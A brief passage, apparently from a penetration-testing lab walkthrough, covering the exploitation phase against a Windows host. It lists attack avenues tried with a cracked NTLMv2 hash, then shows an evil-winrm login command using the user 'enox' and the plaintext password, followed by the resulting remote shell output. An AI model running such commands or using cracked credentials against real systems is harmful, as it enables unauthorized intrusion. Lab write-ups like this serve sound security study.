Exploitation

Cracked the NTLMV2 Hash for enox. I am going to first try: kerberoasting, aesproasting, pth on all services i can, rdp, see smb shares, winrm, rpc client, maybe ldapsearch now will work.

• aeproasting

• kerberos

• pth

• rpc

• ldapsearch

• winrm

• smb

• rdp

• psexec

Evil winrm was the way in.

evil-winrm -i 192.168.105.165 -u 'enox' -p 'california'    

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\enox\Documents>